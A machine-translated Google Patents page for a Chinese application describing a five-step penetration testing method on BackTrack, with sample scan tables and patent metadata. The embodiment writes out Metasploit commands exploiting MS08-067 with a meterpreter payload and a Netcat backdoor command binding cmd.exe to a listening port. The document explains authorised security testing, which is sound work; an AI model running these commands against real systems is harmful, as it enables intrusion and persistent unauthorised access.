CN103400077A - Penetration testing method based on BackTrack - Google Patents
Penetration testing method based on BackTrack Download PDFInfo
- Publication number
- CN103400077A CN103400077A CN2013103327735A CN201310332773A CN103400077A CN 103400077 A CN103400077 A CN 103400077A CN 2013103327735 A CN2013103327735 A CN 2013103327735A CN 201310332773 A CN201310332773 A CN 201310332773A CN 103400077 A CN103400077 A CN 103400077A
- Authority
- CN
- China
- Prior art keywords
- penetration testing
- backtrack
- scanning
- leak
- target
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention provides a penetration testing method based on BackTrack. The method includes the steps of firstly, obtaining information such as the IP address list of a target system and the like through the reconnaissance method; secondly, obtaining a survival list, a port mapping table and a loophole list of the target through the scanning method; thirdly, achieving the function of invading the target system through certain available loopholes; fourthly, keeping accessing a target host which is successfully attacked; finally, enabling the content in the accessed target host to be formed into a qualified penetration testing report. The penetration testing method based on BackTrack solves the technical problem that an existing penetration testing technology is complex and has the advantages of being simple, clear, easy to use, strong in operability, and the like.
Description
Technical field
The present invention relates to a kind of penetration testing method, be specifically related to a kind of method of penetration testing based on BackTrack.
Background technology
Penetration testing (Penetration Testing), sometimes also be called for short infiltration (PenTest), it is the cover flow process for core security assessment and audit, it is a kind of legal and mandate position computer system, and, to the method that its successful implementation leak is attacked, its objective is in order to make these be subjected to examining system safer.Due to the very clear and definite standard of penetration testing neither one, so the method for penetration testing all depends on tester's level and custom, the perhaps certain methods formulated of some release mechanisms.As the NIST SP800-11 that is delivered by American National Standard and research institute) directive document, this document has provided a penetration testing method that is comprised of plan, excavation, attack and report.
Be exactly Evaluation of Information System Security framework (ISSAF) in addition, it is a safety test of increasing income and analytical framework, proposes to carry out dividing domain with the service logic that is subjected to examining system, then take territory as unit, carries out safety assessment.The safety detecting method handbook (OSSTM) of increasing income is the extensively safety test standard of approval of industry, it has proposed one and delimited by scope, the communication exchange, the method for testing that index and vector form, set up a technology guide that targeted environment is carried out integrated testability.
Also having penetration testing operative norm (PTES) is also the new standard of a development, it is divided into seven stages to penetration testing, is respectively early stage mutual, information acquisition, threat, modeling, leak analysis, penetration attack, rear penetration attack and generate report.
Although method set forth above has provided the direction about penetration testing, but this penetration testing technical application is comparatively complicated, therefore the present invention is exactly with the PTES standard base, in conjunction with BackTrack instrument characteristics, and a kind of method of penetration testing based on BackTRack of proposition.
Summary of the invention
, in order to solve the comparatively complicated technical matters of existing penetration testing technology, the invention provides a kind of method of penetration testing based on BackTRack.
Concrete grammar provided by the invention is as follows:
A kind of method of penetration testing based on BackTRack;
1) obtain the information such as IP address table of goal systems by reconnaissance;
2) obtain survival list, port mapping table and the leak list of target by scanning method;
3) realize the function of intrusion target system by the utilized leak of determining;
4) destination host after successful attack is kept access;
5) content in the destination host that will access forms qualified penetration testing report.
Preferably, the described reconnaissance in above-mentioned steps 1 is Active Intelligence and passive reconnaissance.
Preferably, above-mentioned scanning method is survival scanning, port scanning and vulnerability scanning method.
Preferably, above-mentioned leak utilization is after having determined some available leaks, can use the built-in Metasploit leak of BackTrack to utilize framework to carry out leak and overflow.
Preferably, above-mentioned qualified penetration testing report comprises the comprehensive report of the description of the general property in penetration testing stage and comprehensive report is carried out the detailed property report of labor.
Preferably, above-mentioned survival scanning method is whether to have general the most frequently used ping scan function with verification system, if have, built-inly in Backtrack can go to identify target whether instrument FPing or arping or the arping2 of online ping scanning, the survival list that provides described instrument finally to obtain target for the penetration testing person.
Preferably, above-mentioned port scanning method is after target identification, after a destination address has been arranged, proceed port scanning work, enable what sundry services does with the identification goal systems, thereby can attempt excavating more information, thereby obtained port mapping table.
Preferably, above-mentioned vulnerability scanning method is by obtaining a port mapping table after port scanning, then carry out vulnerability scanning after scanning strategy is set, obtain the leak list after crossing vulnerability scanning.
Enforcement the present invention have the following advantages:
The present invention mainly is platform by the Backtrack system take the penetration testing special use, proposed based on scouting, and scanning, the leak utilization, keep access and generate the penetration testing method of reporting.For the comparatively complicated technical matters of penetration testing, the characteristics such as the method has concisely with respect to other penetration testing method, and is easy-to-use, workable.
Description of drawings
Fig. 1 is the process flow diagram of penetration testing method in the present invention.
Embodiment
Penetration testing based on BackTrack platform method provided by the invention is divided into five succinct one step process to penetration testing, is respectively scouting, scanning, and the leak utilization, keep access and generate report.Ripe methodology benefits to the work of penetration testing, popular many testing methodologies in the penetration testing field, have their own characteristics each, but mostly comparatively complicated, the present invention is under the prerequisite that combines the whole bag of tricks opinion, proposed a kind of 5 footworks of the penetration testing based on the BackTrack system of learning and applying that are easy to, be mainly: scouting, scanning, leak utilization, kept access and generate report.
Concrete methods of realizing is as follows:
Step 1, the scouting stage.Be divided into Active Intelligence and passive scouting, finally take the information such as IP address table that obtain goal systems as purpose.A lot of very outstanding reconnaissane tools are arranged in the BackTrack system, wherein HTTrack is exactly one of them, it can with whole website by industry copy, can create and the identical off line copy in targeted website, the outstanding part of this instrument is with regard to be can be in the situation that off line going to find the leak of website and needn't exchange frequently with server heartily can effectively reduce found possibility.After carrying out Active Intelligence, believe the relevant information that has obtained goal systems, then just can enter the stage of passive scouting.BackTrack system intialization Whois, Nslookup etc. are instrument effectively.
Step 2, sweep phase.Be divided into survival scanning, port scanning and vulnerability scanning.
Survival scanning; Whether verification system exists general the most frequently used means to use exactly ping scanning, the instrument FPing of built-in ping scanning in Backtrack, also have simultaneously arping, the instruments such as arping2, these instruments can whether online for the penetration testing person if going to identify target.The survival list that finally can obtain target as:
The valid ip address list
| The IP address |
| 10.244.175.5 |
| 10.244.175.6 |
| 10.244.175.10 |
| 10.244.175.11 |
| 10.244.175.12 |
| 10.244.175.13 |
Through after target identification, a destination address has just been arranged, below just can proceed port scanning work, enabled what sundry services does to identify goal systems, thereby can attempt excavating more information.Develop 80 ports as destination address, just can continue to use subsequent tool to connect this port, so just can constantly collect the relevant information of monitoring the Web service on this port.Certainly, built-in many port scanning instruments in BackTrack, wherein Nmap is exactly a very outstanding port scanning instrument., can meet most needs.Simultaneously, Nmap except completing basic port scanning, can also load specific step and carry out vulnerability scanning, and parameter is "-script ", and the script storehouse acquiescence of Nmap is in catalogue "/usr/share/nmap/scripts ".Can obtain the open-ended list as:
IP address and port mapping
| The IP address | Open port | Operating system |
| 10.244.175.5 | 135、139、445、21 | Windows?xp?sp1 |
| 10.244.175.6 | 135、139、445、21 | Windows?xp?sp3 |
| 10.244.175.10 | 443、6003、3306 | Linux |
| 10.244.175.11 | 443、6003、3306 | Linux |
| 10.244.175.12 | 443、80、1433 | Windows?xp?sp3 |
| 10.244.175.13 | 443、6004、3306 | Linux |
| 10.244.175.14 | 443、6004、3306 | Linux |
| 10.244.175.254 | 23 | Router |
After having passed through port scanning, just can obtain a port mapping table, then just can continue the work of vulnerability scanning, in this this project, use Nessus as hole scanner.Nessus's is powerful, uses abnormal simply, and can be by accessing https after installation: // 127.0.0.1:8834 visits server end, then scanning strategy is set just can scans.Can obtain after vulnerability scanning the leak list as:
The leak list
Find that after overscanning IP is that 10.244.175.5 exists two high-risk leaks, the leak of endangering in three, can carry out the degree of depth to these leaks and excavate, and leak utilization is controlled destination host.
Step 3, the leak utilization.After having determined some available leaks, just can use the built-in Metasploit leak of BackTrack to utilize framework to carry out leak and overflow.Step is as follows:
1) start Metasploit: open a terminal in BackTrack, input command: " msfconsole " starts Metasploit.
2) utility command " search " search leak attacker: msf〉seach ms08_067;
3) utility command " use " is carried out leak attacker: msf〉use exploit/windows/smb/ms08_067_netapi;
4) utility command " set " selects to attack load: msf〉set payload windows/meterpreter/bind_tcp;
5) utility command " exploit " is attacked goal systems: msf〉exploit.
Just can complete the function that realizes the intrusion target system by above step, still, invade successfully,, except the hard objectives leak, select outside attacker, also will certain understanding be arranged to attacking load, wherein the most famous attack load is exactly Meterpreter.
Step 4, keep access.BackTrack provides some very classical backdoor programs for the tester, and wherein a is exactly Swiss Army Knife Netcat.Netcat is that a permission communication and network traffics flow to the instrument of another computing machine from a computing machine, and it is very flexible and easy-to-use, is the optimal selection that creates back door.After successfully destination host 10.244.175.5 being attacked, after implanting attack load Meterpreter, just can upload Netcat, basic step is as follows: 1) Meterpreter〉upload nc.exe c: windows sysytem32 by Meterpreter, NC is uploaded in destination host; 2) Meterpreter〉nc – L – p999-e cmd.exe starts NC in destination host, wherein parameter " L " represents listen mode, and can after disconnecting, client continue to keep listening state, the program that parameter " e " expression is listed later will be carried out, and this is a key parameter of realizing the back door function.
Step 5, produce report.A qualified penetration testing report can be respectively comprehensive including but not limited to two aspects, in detail property.Comprehensive narration is the description to a general property in penetration testing stage, length need not be oversize, also needn't use too many technical language, accomplish easy-to-understand, allow the client, to your work, a general understanding is arranged, if found the leak that some are important in test, will emphasized, preferably add link, allow interesting reader carry out darker understanding in the detailed property narration of back.The second portion of penetration testing report should be detailed narration, after through the first stage, the achievement of penetration testing having been carried out simple introduction, next just should carry out detailed analysis to whole test process, this part should be included in inventory and the ins and outs of all the elements of finding in test, and this one-phase will meet information security colleague's reading needs.
The foregoing is only preferred embodiment of the present invention, in order to limit the present invention, within the spirit and principles in the present invention not all, any modification of doing, be equal to replacement, improvement etc., within all should being included in protection scope of the present invention.
Claims (8)
1. method of the penetration testing based on BackTRack is characterized in that: said method comprising the steps of:
1) obtain the information such as IP address table of goal systems by reconnaissance;
2) obtain survival list, port mapping table and the leak list of target by scanning method;
3) realize the function of intrusion target system by the utilized leak of determining;
4) destination host after successful attack is kept access;
5) content in the destination host that will access forms qualified penetration testing report.
2. the method for the penetration testing based on BackTRack according to claim 1, it is characterized in that: the described reconnaissance in described step 1 is Active Intelligence and passive reconnaissance.
3. the method for the penetration testing based on BackTRack according to claim 2 is characterized in that: described scanning method is survival scanning, port scanning and vulnerability scanning method.
4. the method for the penetration testing based on BackTRack according to claim 3, it is characterized in that: described leak utilization is after having determined some available leaks, can use the built-in Metasploit leak of BackTrack to utilize framework to carry out leak and overflow.
5. the method for the penetration testing based on BackTRack according to claim 4 is characterized in that: described qualified penetration testing report comprises the comprehensive report of the description of a general property in penetration testing stage and comprehensive report is carried out the detailed property report of labor.
6. the method for the penetration testing based on BackTRack according to claim 5, it is characterized in that: described survival scanning method is whether to have general the most frequently used ping scan function with verification system, if have, built-inly in Backtrack can go to identify target whether instrument FPing or arping or the arping2 of online ping scanning, the survival list that provides described instrument finally to obtain target for the penetration testing person.
7. the method for the penetration testing based on BackTRack according to claim 5, it is characterized in that: described port scanning method is after target identification, after a destination address has been arranged, proceed port scanning work, enabled what sundry services does with the identification goal systems, thereby can attempt excavating more information, thereby obtain port mapping table.
8. the method for the penetration testing based on BackTRack according to claim 7, it is characterized in that: described vulnerability scanning method is by obtaining a port mapping table after port scanning, then carry out vulnerability scanning after scanning strategy is set, obtain the leak list after crossing vulnerability scanning.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2013103327735A CN103400077A (en) | 2013-08-01 | 2013-08-01 | Penetration testing method based on BackTrack |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2013103327735A CN103400077A (en) | 2013-08-01 | 2013-08-01 | Penetration testing method based on BackTrack |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN103400077A true CN103400077A (en) | 2013-11-20 |
Family
ID=49563699
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2013103327735A Pending CN103400077A (en) | 2013-08-01 | 2013-08-01 | Penetration testing method based on BackTrack |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN103400077A (en) |
Cited By (8)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103634658A (en) * | 2013-12-16 | 2014-03-12 | 乐视致新电子科技(天津)有限公司 | Equipment scanning method and equipment scanning device in smart television |
| CN104852921A (en) * | 2015-05-25 | 2015-08-19 | 烽火通信科技股份有限公司 | Test system and method for protecting open port from attacking for network equipment |
| CN105721472A (en) * | 2016-02-23 | 2016-06-29 | 北京皮尔布莱尼软件有限公司 | Port security check method, device and system |
| CN107426227A (en) * | 2017-08-02 | 2017-12-01 | 江苏省邮电规划设计院有限责任公司 | One kind automation safe penetration method of testing |
| CN107566394A (en) * | 2017-09-28 | 2018-01-09 | 小花互联网金融服务(深圳)有限公司 | A kind of newly-increased automatic discovery of cloud platform example host and quick vulnerability scanning method |
| CN109039812A (en) * | 2018-07-20 | 2018-12-18 | 深圳前海微众银行股份有限公司 | port detecting method, system and computer readable storage medium |
| CN110290129A (en) * | 2019-06-20 | 2019-09-27 | 深圳前海微众银行股份有限公司 | A kind of method and device of Web Hole Detection |
| CN112347485A (en) * | 2020-11-10 | 2021-02-09 | 远江盛邦(北京)网络安全科技股份有限公司 | Multi-engine vulnerability acquisition and automatic penetration processing method |
Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102999717A (en) * | 2012-11-20 | 2013-03-27 | 北京信息科技大学 | Rapid implantation code generating system applied to buffer area overflow in network security permeation test |
-
2013
- 2013-08-01 CN CN2013103327735A patent/CN103400077A/en active Pending
Patent Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102999717A (en) * | 2012-11-20 | 2013-03-27 | 北京信息科技大学 | Rapid implantation code generating system applied to buffer area overflow in network security permeation test |
Non-Patent Citations (2)
| Title |
|---|
| SOSO: "基于Linux的渗透检测平台Backtrack", 《黑客防线》, 31 August 2009 (2009-08-31) * |
| 张园超: "渗透测试技术研究与平台建设", 《万方学位论文》, 29 December 2010 (2010-12-29), pages 7 - 31 * |
Cited By (10)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103634658A (en) * | 2013-12-16 | 2014-03-12 | 乐视致新电子科技(天津)有限公司 | Equipment scanning method and equipment scanning device in smart television |
| CN104852921A (en) * | 2015-05-25 | 2015-08-19 | 烽火通信科技股份有限公司 | Test system and method for protecting open port from attacking for network equipment |
| CN105721472A (en) * | 2016-02-23 | 2016-06-29 | 北京皮尔布莱尼软件有限公司 | Port security check method, device and system |
| CN107426227A (en) * | 2017-08-02 | 2017-12-01 | 江苏省邮电规划设计院有限责任公司 | One kind automation safe penetration method of testing |
| CN107426227B (en) * | 2017-08-02 | 2019-09-10 | 中通服咨询设计研究院有限公司 | A kind of automation safe penetration test method |
| CN107566394A (en) * | 2017-09-28 | 2018-01-09 | 小花互联网金融服务(深圳)有限公司 | A kind of newly-increased automatic discovery of cloud platform example host and quick vulnerability scanning method |
| CN109039812A (en) * | 2018-07-20 | 2018-12-18 | 深圳前海微众银行股份有限公司 | port detecting method, system and computer readable storage medium |
| CN110290129A (en) * | 2019-06-20 | 2019-09-27 | 深圳前海微众银行股份有限公司 | A kind of method and device of Web Hole Detection |
| CN112347485A (en) * | 2020-11-10 | 2021-02-09 | 远江盛邦(北京)网络安全科技股份有限公司 | Multi-engine vulnerability acquisition and automatic penetration processing method |
| CN112347485B (en) * | 2020-11-10 | 2024-05-28 | 远江盛邦(北京)网络安全科技股份有限公司 | Processing method for acquiring loopholes and automatically penetrating multiple engines |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN103400077A (en) | Penetration testing method based on BackTrack | |
| Kiran et al. | Building a intrusion detection system for IoT environment using machine learning techniques | |
| US20170019421A1 (en) | Penetration test attack tree generator | |
| Devi et al. | Testing for security weakness of web applications using ethical hacking | |
| Vibhandik et al. | Vulnerability assessment of web applications-a testing approach | |
| Umrao et al. | Vulnerability assessment and penetration testing | |
| Vats et al. | A comprehensive literature review of penetration testing & its applications | |
| Aslan et al. | Mitigating cyber security attacks by being aware of vulnerabilities and bugs | |
| Johari et al. | Penetration testing in IoT network | |
| CN113901475A (en) | Fuzzy mining method for input verification vulnerability of industrial control terminal equipment | |
| Pandey et al. | Vulnerability assessment and penetration testing: a portable solution Implementation | |
| CN113315767A (en) | Electric power Internet of things equipment safety detection system and method | |
| Buhov et al. | Pin it! Improving Android network security at runtime | |
| Kumar et al. | Internal network penetration testing using free/open source tools: Network and system administration approach | |
| Bin Arfaj et al. | Efficacy of Unconventional Penetration Testing Practices. | |
| Filiol et al. | A method for automatic penetration testing and mitigation: A red hat approach | |
| Sweigert et al. | Exploit security vulnerabilities by penetration testing | |
| Shi et al. | Analysis of web security comprehensive evaluation tools | |
| Visoottiviseth et al. | Firmaster: Analysis tool for home router firmware | |
| CN115913756A (en) | Network equipment vulnerability verification method based on known vulnerability entries | |
| Kayacik et al. | Automatically evading IDS using GP authored attacks | |
| CN111800427B (en) | Internet of things equipment evaluation method, device and system | |
| CN113923007A (en) | Safety penetration testing method and device, electronic equipment and storage medium | |
| Cai et al. | Research on penetration testing of IoT gateway based on RISC-V | |
| Kumar et al. | Kali Linux based Empirical Investigation on Vulnerability Evaluation using Pen-Testing tools |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20131120 |
|
| RJ01 | Rejection of invention patent application after publication |